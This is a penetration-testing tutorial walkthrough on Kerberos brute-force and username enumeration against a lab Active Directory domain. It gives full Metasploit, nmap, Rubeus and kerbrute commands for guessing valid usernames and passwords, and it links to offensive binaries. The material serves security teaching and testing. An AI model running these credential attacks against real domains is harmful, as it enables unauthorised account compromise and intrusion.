Kerberos Brute Force Attack
In the previous article, we had explained Forge Kerberos Ticket “Domain Persistence: Golden Ticket Attack” where have discussed how the Kerberos authentication process works and what its service component is. In this post, we are going to perform a Kerberos brute force attack on Port 88, which is used for the Kerberos service for enumerating valid username & password.
Table of Content
- Metasploit
- Nmap
- Rubeus
- Kerbrute
Metasploit
This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes the different responses returned by the service for valid and invalid users.
msf > use auxiliary/gather/kerberos_enumusers msf auxiliary(gather/kerberos_enumusers) > set rhosts 192.168.1.105 msf auxiliary(gather/kerberos_enumusers) > set User_File /root/user.txt msf auxiliary(gather/kerberos_enumusers) > set Domain ignite.local msf auxiliary(gather/kerberos_enumusers) > exploit
According to this module, valid usernames will either receive the TGT in an AS-REP response or trigger the error KRB5KDC_ERR_PREAUTH_REQUIRED, showing that the user must perform pre-authentication. Additionally, this error confirms that the username account is present on the given host.
As result we found three users (Yashika, geet, aarti) are valid user to access Kerberos service.
Nmap
Additionally, this method discovers valid usernames by brute-force querying likely usernames against a Kerberos service. The krb5-enum-users.realm argument is essential because it provides the script with the Kerberos REALM required to guess the usernames effectively.
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='ignite.local',userdb=/root/user.txt 192.168.1.105
Similarly, nmap uses the same approach for enumerating Kerberos usernames.
Rubeus
Kerberos Brute Force Attack can be executed using Rubeus, a C# toolset for raw Kerberos interaction and abuses. This toolset draws heavily from Benjamin Delpy’s Kekeo project (licensed under CC BY-NC-SA 4.0) and Vincent LE TOUX’s MakeMeEnterpriseAdmin project (licensed under GPL v3.0). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization.
You can download it from here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
Now run the following and provide a password list along with domain name.
.\Rubeus.exe brute /passwords:password.txt /WIN-S0V7KMTVLD2.ignite.local /outfile:ignite.txt
password.txt: Password Dictionary
WIN-S0V7KMTVLD2.ignite.local: hostname.domain_name
outfile:ignite.txt: Output file
It will enumerate the valid username & password by trying user, password combination.
Kerbrute
A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication. Download it from here.
Similarly, kerbrute try to check valid username & password against Kerberos with the help of the following command.
python kerbrute.py -dc-ip 192.168.1.105 -domain ignite.local -users /root/user.txt -passwords /root/pass.txt -outputfile ignite.txt
Conclusion
In conclusion, the Kerberos Brute Force Attack remains a common technique for cracking user credentials in Active Directory environments. By trying to guess or decrypt Kerberos tickets, attackers can gain unauthorized access to network resources and escalate their privileges. Understanding and defending against this attack is critical for keeping a secure enterprise environment.
Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn
I’m interested